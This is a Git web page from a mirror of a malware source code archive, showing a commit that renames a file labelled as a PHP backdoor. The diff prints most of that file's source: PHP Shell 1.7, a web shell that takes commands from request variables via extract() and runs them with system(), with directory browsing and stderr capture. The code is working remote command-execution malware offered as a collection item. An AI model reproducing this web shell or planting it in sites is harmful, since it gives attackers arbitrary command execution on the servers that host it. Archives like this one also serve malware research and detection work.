ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Rename Backdoor.PHP.Agent.ay to Backdoor.PHP.Agent.MartinGeisler

Browse Source
This commit is contained in:
vxunderground 2020-10-15 00:18:28 -05:00 committed by GitHub
parent 8ba77fb546
commit 475aa5fd7a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
PHP/Backdoor.PHP.Agent.ay → PHP/Backdoor.PHP.Agent.MartinGeisler
View File

@ -1,6 +1,6 @@
<?php <?php
define(´PHPSHELL_VERSION´, ´1.7´); define(´PHPSHELL_VERSION´, ´1.7´);
/* /*
@ -43,8 +43,8 @@ Place - Suite 330, Boston, MA 02111-1307, USA.
<?php <?php
if (ini_get(´register_globals´) != ´1´) { if (ini_get(´register_globals´) != ´1´) {
/* We´ll register the variables as globals: */ /* We´ll register the variables as globals: */
if (!empty($HTTP_POST_VARS)) if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS); extract($HTTP_POST_VARS);
@ -59,12 +59,12 @@ extract($HTTP_SERVER_VARS);
if (!empty($work_dir)) { if (!empty($work_dir)) {
/* A workdir has been asked for */ /* A workdir has been asked for */
if (!empty($command)) { if (!empty($command)) {
if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) { if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) {
/* We try and match a cd command. */ /* We try and match a cd command. */
if ($regs[1][0] == ´/´) { if ($regs[1][0] == ´/´) {
$new_dir = $regs[1]; // ´cd /something/...´ $new_dir = $regs[1]; // ´cd /something/...´
} else { } else {
$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´ $new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´
} }
if (file_exists($new_dir) && is_dir($new_dir)) { if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir; $work_dir = $new_dir;
@ -79,8 +79,8 @@ if (file_exists($work_dir) && is_dir($work_dir)) {
chdir($work_dir); chdir($work_dir);
} }
/* We now update $work_dir to avoid things like ´/foo/../bar´: */ /* We now update $work_dir to avoid things like ´/foo/../bar´: */
$work_dir = exec(´pwd´); $work_dir = exec(´pwd´);
?> ?>
@ -88,15 +88,15 @@ $work_dir = exec(
<p>Current working directory: <b> <p>Current working directory: <b>
<?php <?php
$work_dir_splitted = explode(´/´, substr($work_dir, 1)); $work_dir_splitted = explode(´/´, substr($work_dir, 1));
echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´; echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´;
if (!empty($work_dir_splitted[0])) { if (!empty($work_dir_splitted[0])) {
$path = ´´; $path = ´´;
for ($i = 0; $i < count($work_dir_splitted); $i++) { for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= ´/´ . $work_dir_splitted[$i]; $path .= ´/´ . $work_dir_splitted[$i];
printf(´<a xhref="%s?work_dir=%s">%s</a>/´, printf(´<a xhref="%s?work_dir=%s">%s</a>/´,
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]); $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
} }
} }
@ -110,15 +110,15 @@ $dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */ /* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) { while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) { if (is_dir($dir)) {
if ($dir == ´.´) { if ($dir == ´.´) {
echo "<option value="$work_dir" selected>Current Directory</option> "; echo "<option value="$work_dir" selected>Current Directory</option> ";
} elseif ($dir == ´..´) { } elseif ($dir == ´..´) {
/* We have found the parent dir. We must be carefull if the parent /* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */ directory is the root directory (/). */
if (strlen($work_dir) == 1) { if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There´s no /* work_dir is only 1 charecter - it can only be / There´s no
parent directory then. */ parent directory then. */
} elseif (strrpos($work_dir, ´/´) == 0) { } elseif (strrpos($work_dir, ´/´) == 0) {
/* The last / in work_dir were the first charecter. /* The last / in work_dir were the first charecter.
This means that we have a top-level directory This means that we have a top-level directory
eg. /bin or /home etc... */ eg. /bin or /home etc... */
@ -129,7 +129,7 @@ directory... Trust me - it works :-) */
echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> "; echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
} }
} else { } else {
if ($work_dir == ´/´) { if ($work_dir == ´/´) {
echo "<option value="$work_dir$dir">$dir</option> "; echo "<option value="$work_dir$dir">$dir</option> ";
} else { } else {
echo "<option value="$work_dir/$dir">$dir</option> "; echo "<option value="$work_dir/$dir">$dir</option> ";
@ -152,12 +152,12 @@ closedir($dir_handle);
<?php <?php
if (!empty($command)) { if (!empty($command)) {
if ($stderr) { if ($stderr) {
$tmpfile = tempnam(´/tmp´, ´phpshell´); $tmpfile = tempnam(´/tmp´, ´phpshell´);
$command .= " 1> $tmpfile 2>&1; " . $command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile"; "cat $tmpfile; rm $tmpfile";
} else if ($command == ´ls´) { } else if ($command == ´ls´) {
/* ls looks much better with ´ -F´, IMHO. */ /* ls looks much better with ´ -F´, IMHO. */
$command .= ´ -F´; $command .= ´ -F´;
} }
system($command); system($command);
} }
@ -171,7 +171,7 @@ document.forms[0].command.focus();
</script> </script>
<hr> <hr>
<i>Copyright © 20042005, <a <i>Copyright © 20042005, <a
href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i> href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
</body> </body>
</html> </html>